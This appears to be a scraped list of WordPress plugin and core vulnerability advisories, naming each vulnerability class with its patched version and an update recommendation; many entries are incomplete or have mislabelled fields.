Plugin: SP Project & Document Manager

Vulnerability: Arbitrary File Upload
Patched Version: 2.6.1.4
Recommended Action: Update to version 2.6.1.4, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 22.5
Recommended Action: Update to version 22.5, or a newer patched version

Plugin: Stamped.io Product Reviews & UGC for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Missing Authorization
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Smooth Scroll Links [SSL]

Plugin: Clean Login

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.13.7
Recommended Action: Update to version 1.13.7, or a newer patched version

Plugin: WPML

Vulnerability: Authorization Bypass
Patched Version: 3.1.9.1
Recommended Action: Update to version 3.1.9.1, or a newer patched version

Plugin: WordPress PDF Light Viewer Plugin

Vulnerability: Authenticated Command Injection
Patched Version: 1.4.12
Recommended Action: Update to version 1.4.12, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated HTML Injection leading to Spam Emails
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Cross-Site Request Forgery to Arbitrary Quiz Deletion and Copying
Patched Version: 1.3.2.5
Recommended Action: Update to version 1.3.2.5, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Login using WordPress Users ( WP as SAML IDP )

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.13.4
Recommended Action: Update to version 1.13.4, or a newer patched version

Plugin: Add Shortcodes Actions And Filters

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting via Form Name
Patched Version: 6.8.9
Recommended Action: Update to version 6.8.9, or a newer patched version

Plugin: WP Abstracts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: WP Survey Plus

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.4.22
Recommended Action: Update to version 3.4.22, or a newer patched version

Plugin: Fast & Effective Popups & Lead-Generation for WordPress – HollerBox

Vulnerability: Authenticated (edit_popups+) SQL Injection
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 1.5.64
Recommended Action: Update to version 1.5.64, or a newer patched version

Plugin: Team – Team Members Showcase Plugin

Vulnerability: WordPress Team Member Showcase Plugin <= 4.1.1
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: Formzu WP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: Smarty for WordPress

Plugin: Paytium: Mollie payment forms & donations

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: pootle button

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Authenticated Stored Cross-Site Scripting via Shortcode
Patched Version: 4.16.3
Recommended Action: Update to version 4.16.3, or a newer patched version

Plugin: Menu Swapper

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Andrea Pernici News Sitemap for Google

Plugin: WordPress Share Buttons Plugin – AddThis

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 5.0.13
Recommended Action: Update to version 5.0.13, or a newer patched version

Plugin: Animate It!

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: GroupDocs.Comparison for Cloud

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_remove_cdn_integration_ajax_request_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Network Publisher

Vulnerability: Cross-Site Scripting
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Webinar Solution: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.14.3
Recommended Action: Update to version 2.14.3, or a newer patched version

Plugin: Backend Localization

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: wpCentral

Plugin: WordPress HTTPS (SSL)

Vulnerability: Missing Authorization to Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: bbp style pack

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.5.6
Recommended Action: Update to version 5.5.6, or a newer patched version

Plugin: Limit Login Attempts (Spam Protection)

Vulnerability: Unauthenticated SQL Injection
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Calendar Event Multi View

Vulnerability: Missing Authentication leading to Authenticated (Subscriber+) Private Form Submission
Patched Version: 1.4.11
Recommended Action: Update to version 1.4.11, or a newer patched version

Plugin: WP-Banners-Lite

Plugin: Woocommerce ESTO

Vulnerability: Cross-Site Request Forgery via saveSetting
Patched Version: 2.23.2
Recommended Action: Update to version 2.23.2, or a newer patched version

Plugin: WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.44
Recommended Action: Update to version 2.0.44, or a newer patched version

Plugin: Trending/Popular Post Slider and Widget

Vulnerability: Cross-Site Request Forgery via wtpsw_post_view_count
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: WP Reroute Email

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: Privilege Escalation
Patched Version: 3.5.29
Recommended Action: Update to version 3.5.29, or a newer patched version

Plugin: Product Catalog Simple

Vulnerability: Cross-Site Request Forgery via ic_system_status
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: IgniteUp – Coming Soon and Maintenance Mode

Vulnerability: Unauthenticated Arbitrary File Deletion
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Insufficient Authorization to Comment Submission on Deleted Posts
Patched Version: 7.6.11
Recommended Action: Update to version 7.6.11, or a newer patched version

Plugin: Adning Advertising

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: WD Instagram Feed Premium

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: ImageMagick Engine

Vulnerability: Cross-Site Request Forgery to PHAR Deserialization
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Product Delivery Date for WooCommerce – Lite

Vulnerability: Missing Authorization
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Canto

Vulnerability: Blind Server-Side Request Forgery via get.php
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Missing Authorization in ‘regenerateSitemaps’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Quiz Tool Lite

Plugin: Sticky Popup

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Cross-site request forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Injection Guard

Vulnerability: Cross-Site Request Forgery via ig_update
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: TerraClassifieds – Simple Classifieds Plugin

Plugin: WooCommerce Subscription

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: MainWP Clone Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: WP Time Slots Booking Form

Vulnerability: Improper Authorization Checks
Patched Version: 1.1.83
Recommended Action: Update to version 1.1.83, or a newer patched version

Plugin: Social Feed | All social media in one place

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting]
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All Bootstrap Blocks

Vulnerability: Cross-Site Request Forgery to Plugin Settings Reset
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Interactive Medical Drawing of Human Body

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Thank You Counter Button

Plugin: Companion Sitemap Generator – HTML & XML

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.5.3
Recommended Action: Update to version 4.5.3, or a newer patched version

Plugin: WP eCommerce

Vulnerability: SQL Injection
Patched Version: 3.8.7.6
Recommended Action: Update to version 3.8.7.6, or a newer patched version

Plugin: CommentTweets

Plugin: WP Private Messages

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: OneLogin SAML SSO

Vulnerability: Distributed Denial-of-Service
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: RSVP and Event Management

Vulnerability: Unauthenticated Sensitive Information Disclosure
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Simple Mail Address Encoder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Button Generator – easily Button Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Educare – Students & Result Management System

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in savetmplfile function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: WP Symposium

Vulnerability: Unauthenticated SQL Injection
Patched Version: 15.8
Recommended Action: Update to version 15.8, or a newer patched version

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WordPress Related Posts

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: uContext for Clickbank

Plugin: Easy Forms for Mailchimp

Vulnerability: Reflected Cross-Site Scripting via ‘sql_error’
Patched Version: 6.8.9
Recommended Action: Update to version 6.8.9, or a newer patched version

Plugin: WPSmartContracts

Vulnerability: Authenticated (Author+) SQL Injection
Patched Version: 1.3.12
Recommended Action: Update to version 1.3.12, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Privilege Escalation via Arbitrary User Meta Updates
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: 微信打赏（Wechat Reward）

Plugin: Availability Calendar

Vulnerability: Cross-Site Request Forgery via add_availability_calendar_create_admin_page()
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Powie's WHOIS Domain Check

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.9.32
Recommended Action: Update to version 0.9.32, or a newer patched version

Plugin: ToTop Link

Plugin: Mondial Relay & Chronopost plugin for WooCommerce – WCMultiShipping

Vulnerability: Missing Authorization to Log Export
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: Customify – Intuitive Website Styling

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.10.5
Recommended Action: Update to version 2.10.5, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Cross-Site Request Forgery to WPForm/Blocks Import
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: File Read / Directory Traversal
Patched Version: 0.9.4
Recommended Action: Update to version 0.9.4, or a newer patched version

Plugin: WP-Paginate

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: IP Spoofing
Patched Version: 5.2.5.1
Recommended Action: Update to version 5.2.5.1, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service via XML
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: SQL Injection
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Referrer Detector

Plugin: Germanized for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Scripting
Patched Version: 7.1.19
Recommended Action: Update to version 7.1.19, or a newer patched version

Plugin: WP Extended Search

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: Authenticated (Contributor+) SQL Injection via shortcode
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Post Gallery

Plugin: Responsive Lightbox & Gallery

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via name
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: YaySMTP – WP SMTP Plugin with Full Email Log & 15+ SMTP Services

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.14, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: Appointment Booking Calendar

Vulnerability: SQL Injection
Patched Version: 1.1.24
Recommended Action: Update to version 1.1.24, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Custom Registration Forms, User Registration and User Login Plugin <= 4.6.0.2
Patched Version: 4.6.0.3
Recommended Action: Update to version 4.6.0.3, or a newer patched version

Plugin: Task Manager Pro – Task Management Plugin For WordPress

Plugin: StatPressCN

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: directories

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.46
Recommended Action: Update to version 1.3.46, or a newer patched version

Plugin: This Day In History

Plugin: Relevanssi – A Better Search

Vulnerability: SQL Injection
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: PDF Viewer & 3D PDF Flipbook – DearPDF

Plugin: WP-CommentNavi

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.12.2
Recommended Action: Update to version 1.12.2, or a newer patched version

Plugin: Codup WooCommerce Dynamic Pricing Table View

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.1.5
Recommended Action: Update to version 1.2.1.5, or a newer patched version

Plugin: Ultimate Taxonomy Manager

Plugin: Page Generator

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Uploading SVG, WEBP and ICO files

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Social Sharing Plugin – Social Warfare

Vulnerability: Missing Authorization
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: cformsII

Vulnerability: CAPTCHA Bypass
Patched Version: 14.11
Recommended Action: Update to version 14.11, or a newer patched version

Plugin: Mimetic Books

Plugin: BuddyPress

Vulnerability: Insufficient Input Validation
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: WP Photo Album Plus

Vulnerability: Cross-Site Scripting
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: LayerSlider

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Aspose.Words – Import and Export word documents

Vulnerability: Arbitrary File Download
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: IMDB Profile Widget

Vulnerability: Local File Inclusion
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Laposta Signup Embed

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.3.7
Recommended Action: Update to version 7.3.7, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Shortcodes
Patched Version: 3.7.11
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.11, 3.8.11, 3.9.9, 4.0.8, 4.1.8, 4.2.5, 4.3.1

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Cross-Site Request Forgery to Plugin Settings Change
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Local File Inclusion
Patched Version: 9.4.3
Recommended Action: Update to version 9.4.3, or a newer patched version

Plugin: GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress

Vulnerability: Missing Authorization to User Points Updates
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Zippy

Vulnerability: Authenticated (Contributor+) Sensitive Information Disclosure
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Orbit Fox by ThemeIsle

Vulnerability: Authenticated (Author+) Server-Side Request Forgery via URL
Patched Version: 2.10.24
Recommended Action: Update to version 2.10.24, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: Missing Authorization
Patched Version: 1.3.72
Recommended Action: Update to version 1.3.72, or a newer patched version

Plugin: WooCommerce Stripe Payment Gateway

Vulnerability: Missing Authorization
Patched Version: 7.4.1
Recommended Action: Update to version 7.4.1, or a newer patched version

Plugin: Tawk.To Live Chat

Vulnerability: Missing Authorization to Visitor Monitoring & Chat Removal
Patched Version: 0.6.0
Recommended Action: Update to version 0.6.0, or a newer patched version

Plugin: track-that-stat

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: AppPresser – Mobile App Framework

Vulnerability: Insecure Password Reset Mechanism
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Gutenverse – Ultimate Block Addons and Page Builder for Site Editor

Vulnerability: Missing Authorization via ‘data/update’ API Endpoint
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: Apollo13 Framework Extensions

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: WP Activity Log Premium

Vulnerability: Cross-Site Request Forgery via ajax_switch_db
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: WordPress Multisite User Sync/Unsync (Premium)

Vulnerability: No subtitle
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: ElasticPress

Vulnerability: Remote Code Execution
Patched Version: 4.4.1
Recommended Action: Update to version 4.4.1, or a newer patched version

Plugin: EZP Coming Soon Page

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Laybuy Payment Extension for WooCommerce

Plugin: Redirection

Vulnerability: Missing Authorization in ‘SaveSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Accordion and Accordion Slider

Vulnerability: Missing Authorization via ‘wp_aas_get_attachment_edit_form’ and ‘wp_aas_save_attachment_data’
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: SB Uploader

Plugin: WP Import Export Lite

Vulnerability: Unauthenticated Sensitive Data Disclosure
Patched Version: 3.9.16
Recommended Action: Update to version 3.9.16, or a newer patched version

Plugin: Email Log

Vulnerability: Admin+ SQL Injection
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: WP-Cirrus

Plugin: Contact Form Submissions

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting via Shortcode
Patched Version: 1.4.9.9
Recommended Action: Update to version 1.4.9.9, or a newer patched version

Plugin: Pricing Deals for WooCommerce

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Ovic Responsive WPBakery

Vulnerability: Authenticated (Subscriber+) Arbitrary Option Update
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.22
Recommended Action: Update to version 3.1.22, or a newer patched version

Plugin: iPages Flipbook For WordPress

Vulnerability: Authenticated Contributor+ Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Easy Digital Downloads – Conditional Success Redirects

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: PDF.js Viewer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Hide My WP Ghost – Security & Firewall

Vulnerability: IP Address Spoofing to Protection Mechanism Bypass
Patched Version: 5.0.20
Recommended Action: Update to version 5.0.20, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.1.19
Recommended Action: Update to version 8.1.19, or a newer patched version

Plugin: Classified Core

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Stripe Payment Plugin for WooCommerce

Vulnerability: Authentication Bypass
Patched Version: 3.7.8
Recommended Action: Update to version 3.7.8, or a newer patched version

Plugin: Client Portal : SuiteDash Direct Login

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: AdFoxly – Ad Manager, AdSense Ads & Ads.txt

Plugin: Floating Social Bar

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Portfolio for Elementor & Image Gallery | PowerFolio

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Twitget

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Haxcan

Vulnerability: Authenticated (Admin+) Path Traversal to Arbitrary File Read
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Secure HTML5 Video Player

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Core: WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.7.9
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.9, 3.8.9, 3.9.7, 4.0.6, 4.1.6, 4.2.3

Plugin: Indeed Membership Pro

Vulnerability: Arbitrary File Upload
Patched Version: 7.6
Recommended Action: Update to version 7.6, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘deleteCssAndJsCacheToolbar’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Loco Translate

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Authorize.net Add-on for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: SQL Injection
Patched Version: 1.3.59
Recommended Action: Update to version 1.3.59, or a newer patched version

Plugin: WP Photo Album Plus

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.4.18
Recommended Action: Update to version 5.4.18, or a newer patched version

Plugin: Thrive Automator

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.17.1
Recommended Action: Update to version 1.17.1, or a newer patched version

Plugin: Login Screen Manager

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Toolset Types – Custom Post Types, Custom Fields and Taxonomies

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: BadgeOS

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.7.1.3
Recommended Action: Update to version 3.7.1.3, or a newer patched version

Plugin: 12 Step Meeting List

Vulnerability: Authenticated (Contributor+) Server-Side Request Forgery
Patched Version: 3.14.25
Recommended Action: Update to version 3.14.25, or a newer patched version

Plugin: WP Helper Premium

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Custom Login Page Styler

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.2.5
Recommended Action: Update to version 6.2.5, or a newer patched version

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 5.2.9
Recommended Action: Update to version 5.2.9, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: SQL Injection
Patched Version: 1.2.25
Recommended Action: Update to version 1.2.25, or a newer patched version

Plugin: BP Group Documents

Vulnerability: Path Traversal
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

